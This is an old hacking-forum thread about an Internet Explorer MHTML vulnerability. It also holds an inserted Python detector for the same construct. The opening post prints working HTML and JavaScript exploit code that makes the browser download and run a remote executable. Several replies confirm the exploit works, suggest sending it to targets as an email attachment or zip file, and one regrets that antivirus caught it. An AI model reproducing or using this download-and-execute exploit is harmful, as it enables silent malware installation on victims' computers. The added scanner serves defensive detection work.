Newest Ie Vulnerability

#1 User is offline   gsicht 

  • Private First Class
  • Group: Members
  • Posts: 91
  • Joined: 09-October 03

Posted 28 November 2003 - 06:23 AM

advisory:
http://packetstormse.../mhtmlredir.txt

do you know this vulnerability? i've found some html code for this:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <script>
  WaitForDocumentCached_TIME=100;

  function LaunchRemoteExe_Step2()
  {
    //One more fresh action is present for more stable performance
    for(i=1;i<=2;i++)
      w.document.execCommand("Refresh");
  }

  function LaunchRemoteExe(ExeUrl)
  {
    w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes");
    w.document.write("<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111113' CODEBASE='mhtml:file://C:\NO_SUCH_MHT.MHT!" + ExeUrl + "'>");
    setTimeout("LaunchRemoteExe_Step2()",WaitForDocumentCached_TIME);
  }

  LaunchRemoteExe("http://127.0.0.1/EXE.EXE") <!-- and end it with -->
  </script>

</head>
<body>
</body>
</html>

it will download and execute exe.exe from http://127.0.0.1/.
can someone test this code? i don't have ie :rolleyes:
0

#2 Guest_liquidSilver_*

  • Group: Guests

Posted 28 November 2003 - 07:58 AM

Hello..

I will test it locally. Be right back with results.

Regards,
LiquidSilver.
0

#3 Guest_liquidSilver_*

  • Group: Guests

Posted 28 November 2003 - 08:05 AM

No results at all.. Hmm.. I will try some other methods.

Regards,
LiquidSilver.
0

#4 User is offline   gsicht 

  • Private First Class
  • Group: Members
  • Posts: 91
  • Joined: 09-October 03

Posted 28 November 2003 - 08:16 AM

i think it's a very interesting bug.
here is a harmless example of how to exploit it:
http://www.safecente...Demo/index.html
0

#5 Guest_liquidSilver_*

  • Group: Guests

Posted 28 November 2003 - 08:31 AM

Hello..

Quote from the site:

Quote

This demo assumes
1.WinXp or Win2k3 is installed at C:\WINDOWS.
2.A small web page(less than 3 kbyte) can be downloaded within 4 seconds.


I am currently running Win98 on this computer, I will try it on my other Win2k computer later on.

Yes, it can be very interesting code - but what did I just download?! PayLoad.exe?! uhm..?!

Regards,
LiquidSilver.
0

#6 Guest_liquidSilver_*

  • Group: Guests

Posted 28 November 2003 - 08:34 AM

Ah, I checked the exe file, it was empty.. hehe. :rolleyes:
0

#7 User is offline   tareq 

  • Private First Class
  • Group: Members
  • Posts: 34
  • Joined: 07-September 03

Posted 28 November 2003 - 08:50 AM

it won't work mate
i tested it on myself, winxp sp1 5.1.2600
0

#8 Guest_Axl_*

  • Group: Guests

Posted 29 November 2003 - 01:20 AM

the second one looks nice !

thanks !
0

#9 User is offline   gogu258 

  • Private First Class
  • Group: Members
  • Posts: 138
  • Joined: 03-September 03

Posted 30 November 2003 - 04:34 PM

It works on W2K (Windows 2000) but only locally. I think it should work on XP and 2003; little research, but with good results on W2K. It downloads the exe file and runs it, but as I told you before, only if you open the page on your system.
0

#10 User is offline   extreme 

  • Specialist
  • Group: Specialist
  • Posts: 582
  • Joined: 02-September 03

Posted 01 December 2003 - 05:00 PM

Well, it wasn't meant to work remotely. But it should be enough too. Just attach HTML file in email.. Who would think that HTML file could be infected..?!?
WUTranslink
0

#11 User is offline   jawz 

  • Private First Class
  • Group: Members
  • Posts: 29
  • Joined: 03-December 03

Posted 03 December 2003 - 01:29 PM

The exploit works on my Windows XP. Fortunately, McAfee is able to detect and neutralize the exploit (Exploit-CodeBase).
0
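
Added example, not part of the thread and not any antivirus vendor's signature: a Python check that a mail or web filter could run to flag the construct in post #1, an OBJECT whose CODEBASE uses the mhtml: scheme, whether it appears as markup or is assembled in a script string. The names scan_html and split_mhtml and the sample documents are assumptions made for this example.

```python
import re
from html.parser import HTMLParser

# CODEBASE assembled inside a script string, e.g. via document.write()
SCRIPT_CODEBASE = re.compile(r"codebase\s*=\s*\\?['\"]?\s*(mhtml:[^'\"\s>]*)", re.I)

class CodebaseScanner(HTMLParser):
    """Collects OBJECT CODEBASE values that use the mhtml: scheme."""
    def __init__(self):
        super().__init__()
        self.findings = []    # list of (where, codebase value)
        self._script = None   # buffered <script> text, None outside a script

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script = []
        elif tag == "object":
            codebase = (dict(attrs).get("codebase") or "").strip()
            if codebase.lower().startswith("mhtml:"):
                self.findings.append(("object-tag", codebase))

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self.flush_script()

    def flush_script(self):
        text, self._script = "".join(self._script or []), None
        for m in SCRIPT_CODEBASE.finditer(text):
            self.findings.append(("script-string", m.group(1)))

def scan_html(text):
    scanner = CodebaseScanner()
    scanner.feed(text)
    scanner.close()
    scanner.flush_script()  # covers a <script> that was never closed
    return scanner.findings

def split_mhtml(ref):
    """'mhtml:<container>!<inner>' -> (container, part after '!')."""
    container, _, inner = ref[len("mhtml:"):].partition("!")
    return container, inner

# Constructed, inert samples (example.invalid does not resolve)
SAMPLES = {
    "static.html": r"""<object classid="clsid:0" codebase="mhtml:file://C:\none.mht!http://example.invalid/a.bin"></object>""",
    "scripted.html": r"""<script>w.document.write("<OBJECT CODEBASE='mhtml:file://C:\none.mht!" + url + "'>");</script>""",
    "benign.html": r"""<object classid="clsid:0" codebase="http://example.invalid/control.cab"></object>""",
}
```

A script-string finding has an empty inner part because the URL is concatenated at run time; the flag is the mhtml: CODEBASE itself.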

#12 User is offline   aiboforcen 

  • Private First Class
  • Group: Members
  • Posts: 34
  • Joined: 17-October 03

Posted 04 December 2003 - 07:17 AM

www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.html
This exploit works fine for me too. But when i upload the exploit to another asp host it won't work anymore. I think it's very strange because i haven't changed the code and I have tried at least 3 different web hosts which support asp.
Anyone got any solution ? :blink:
0

#13 User is offline   mnemonix 

  • Private
  • Group: Members
  • Posts: 3
  • Joined: 22-August 03

Posted 08 December 2003 - 03:52 AM

Works on xp sp1

Some nice work
0

#14 User is offline   gogu258 

  • Private First Class
  • Group: Members
  • Posts: 138
  • Joined: 03-September 03

Posted 08 December 2003 - 12:16 PM

There you have another problem, if your target doesn't use Outlook or something like that....like Yahoo email, your attachment will be shown as a web page, but remote not local....so you have to use it as zip file.....
0

#15 User is offline   FiStEh 

  • Private First Class
  • Group: Members
  • Posts: 58
  • Joined: 30-November 03

Posted 09 December 2003 - 08:46 AM

F-secure anti-virus picked up the malicious code. D'oh, that would've been nice :angry:
FiStEy
0
